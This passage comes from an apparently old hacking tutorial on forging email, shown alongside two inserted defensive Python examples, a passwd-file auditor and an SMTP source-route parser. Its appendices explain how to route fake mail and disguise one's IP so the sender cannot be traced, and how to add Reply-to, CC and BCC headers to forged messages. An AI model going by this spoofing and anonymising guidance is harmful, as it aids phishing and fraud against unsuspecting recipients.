Unix encrypts passwords and then compares it to the passwords in a given
password file. If the passwords match, it will announce the correct
password for that username.
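An added example, not part of the tutorial, that parses lines in the seven-field format described in item 33 and reports the entries a sysadmin should worry about: an empty password field (login with no password, as in the 8.8.4 write-up), a non-root entry with UID 0, a password field outside the crypt(3) character set from Note 3, and duplicate usernames. The function names are mine; the sample file is constructed and its 13-character "hashes" are made-up strings, not real crypt output.

```python
"""Parser and audit for /etc/passwd lines (added example)."""
import re
from collections import namedtuple

PasswdEntry = namedtuple("PasswdEntry", "user pw uid gid gecos home shell")

# Note 3 above: crypt(3) output uses only '.', '/', digits and letters.
_CRYPT_CHARS = re.compile(r"^[./0-9A-Za-z]+$")

# Constructed sample file; the last line is the one from the 8.8.4 write-up.
SAMPLE_PASSWD = """\
root:AbCdEfGhIjKlM:0:0:root:/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/false
alice:NoPqRsTuVwXyZ:1001:100:Alice Example:/home/alice:/bin/bash
lord::0:0:leet shit:/root:/bin/bash
"""


def parse_passwd_line(line):
    """Split one line into a PasswdEntry; UID and GID become ints."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 7:
        raise ValueError("expected 7 colon-separated fields, got %d" % len(fields))
    user, pw, uid, gid, gecos, home, shell = fields
    return PasswdEntry(user, pw, int(uid), int(gid), gecos, home, shell)


def _entries(text):
    return [parse_passwd_line(l) for l in text.splitlines() if l.strip()]


def audit_passwd(text):
    """Return a list of (username, finding-code) for a whole passwd file."""
    findings = []
    seen = set()
    for e in _entries(text):
        if e.user in seen:
            findings.append((e.user, "duplicate-user"))
        seen.add(e.user)
        if e.pw == "":
            findings.append((e.user, "empty-password"))   # logs in with no password
        elif not _CRYPT_CHARS.match(e.pw):
            findings.append((e.user, "disabled"))         # e.g. '*': cannot log in
        elif len(e.pw) != 13:
            findings.append((e.user, "odd-hash-length"))  # text: hashes are 13 chars
        if e.uid == 0 and e.user != "root":
            findings.append((e.user, "uid0-alias"))       # root rights under another name
    return findings


def uid0_accounts(text):
    """Every username that maps to UID 0, root included."""
    return [e.user for e in _entries(text) if e.uid == 0]
```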
34. Thread - right now I'm talking about threads in discussion lists and
message boards, not in computer programs. We'll discuss those at a later
time (maybe). A thread is a series of posts which started out from a
single one. Let me demonstrate: a person starts a thread by stating a
fact or giving an opinion. Then, another person comes into the discussion
list or the message board and states his opinion on the subject. Then
another person joins in and replies to the replier's opinion. Then
another one comes, but chooses to reply to the original message instead
since he has nothing to say regarding the other messages (if he does, he
can post two messages). You get the picture...
Appendix A: Fake Daemons(1)
===========================
I found these two fake daemons (Sendmail and Telnet(19)) at
packetstorm.securify.com once. They're great to fool attackers and to
play tricks on your friends. These are Perl (a programming language)
programs. To execute them (no, executing a file doesn't have anything to
do with killing it...) on Unix, simply type ./filename and replace
filename with the name of the file you wish to execute. Every Unix
"flavor", "distribution" or whatever you want to call it, comes with Perl
(I think. Correct me if I'm wrong: barakirs@netvision.net.il). To execute
them under DOS/Windows, you have to download Active Perl from
www.activeperl.com and then simply double click them. I don't know how to
execute them under Mac. I guess Active Perl supports Macs, but I'm not
sure.

Now, on to the fake daemons. These two daemons came in a single package
together with a readme file. Following are all three files. I did not
alter any of those files; it's up to you to do so. Play with them and
learn. Oh, by the way, if you wish to learn Perl (or any other
programming language), head off to http://blacksun.box.sk and find the
books section. Enjoy!
Appendix B: Routing Mail
========================
You can make your mail go through many different servers in order to
make the header longer and confuse people who would try to track it down.
Example: if you want to send the fake mail to blah@blah.com, and route it
through blaha.com, blahb.com and blahc.com, then in the 'rcpt to:' part,
simply do this:
@blaha.com,@blahb.com,@blahc.com:blah@blah.com
Note: this will not work on every Sendmail daemon. Thanks to Magnus
Kristiansen for this one! ;-)
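How a receiving mail server handles the source-routed address from this appendix, as an added example that is not part of the tutorial: the parser splits the RFC 821 route (`@host,@host:`) from the final mailbox, and the accept/reject policy is an assumed example (strip the route, log the hops, deliver only to local domains), which is the treatment RFC 5321 Appendix C asks for, not a description of Sendmail's own behaviour.

```python
"""Receiver-side handling of source-routed forward-paths (added example)."""
import re

_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
_DOMAIN_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")
# Optional "@host,@host:" route, then the final mailbox.
_PATH_RE = re.compile(r"^(?:(?P<route>@[^:\s]+):)?(?P<mailbox>[^@\s:]+@[^@\s:]+)$")


def parse_forward_path(arg):
    """Return (hops, mailbox) for the text after 'RCPT TO:'."""
    s = arg.strip()
    if s.startswith("<") and s.endswith(">"):
        s = s[1:-1]
    m = _PATH_RE.match(s)
    if not m:
        raise ValueError("bad forward-path: %r" % arg)
    hops = []
    route = m.group("route")
    if route:
        for hop in route.split(","):
            # every route element must be "@" followed by a valid domain
            if not hop.startswith("@") or not _DOMAIN_RE.match(hop[1:]):
                raise ValueError("bad route element: %r" % hop)
            hops.append(hop[1:].lower())
    mailbox = m.group("mailbox")
    if not _DOMAIN_RE.match(mailbox.rsplit("@", 1)[1]):
        raise ValueError("bad mailbox domain in: %r" % arg)
    return hops, mailbox


def rcpt_decision(arg, local_domains):
    """Example policy: returns ('accept' | 'reject', final mailbox, log note).

    The route is ignored for delivery but kept in the note so an operator
    can see relaying attempts in the log.
    """
    hops, mailbox = parse_forward_path(arg)
    domain = mailbox.rsplit("@", 1)[1].lower()
    note = "source route via %s ignored" % ",".join(hops) if hops else "no source route"
    if domain in {d.lower() for d in local_domains}:
        return "accept", mailbox, note
    return "reject", mailbox, note + "; relaying to %s denied" % domain
```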
Appendix C: Faking your IP
==========================
So you don't want people to find your IP and your hostname when they look
at the full header? Then simply fake your IP! You can do this by using
Wingates or SOCKS firewalls, or by telnetting to the Sendmail daemon from
a shell account. If you use either one of those, the full header will
show the Wingate's/SOCKS firewall's/shell provider's IP address. If you
find a shell account that allows you to telnet out of it, you can use it
to fake your IP. Otherwise, use Wingates or SOCKS firewalls. To learn
more about them, read our Proxy/Wingate/SOCKS tutorial and our anonymity
tutorial at blacksun.box.sk. Also, we recommend going to the books
section on our website and downloading the excellent item called "IP
Spoofing Demystified". The stuff written in there may not be so
practical, but it is very important reading (you will learn a lot of
important stuff that you could use later).
Appendix D: Reply-to
====================
The Reply-to option does the following: when a person receives an Email
with a reply-to address and sends a reply, the reply is sent to the
address specified in the Reply-to header (this does not work on really
really old Email clients). To use it, simply insert this line:
Reply-to: some-user@some-server.net
and replace some-user and some-server.net with the appropriate user and
server. You have to include this line before or after the "Subject:"
part.
Appendix E: CC and BCC
======================
CC is used to send a message to other people who are not the recipients
of the message, but might need the information in it. BCC is used the
same way, only people can only see the recipient. The B in BCC stands for
Blind, while the CC stands for Carbon Copy (like when you copy a page
using... nevermind). So BCC stands for Blind Carbon Copy while CC stands
for Carbon Copy. Exciting, isn't it? Thanks to i2tb for this information.
Want to use CCs and BCCs within your fake Emails? No problem! They work
exactly the same as the Reply-to header in Appendix D. Simply put CC: or
BCC: lines in your fake mail (inside the body of the message), and then
insert the appropriate Email addresses.
References
==========
RFC 821 - the SMTP RFC. Can be found at
http://freesoft.org/CIE/RFC/821/index.htm. Thanks to Chris Karwoski for
this one. ;-)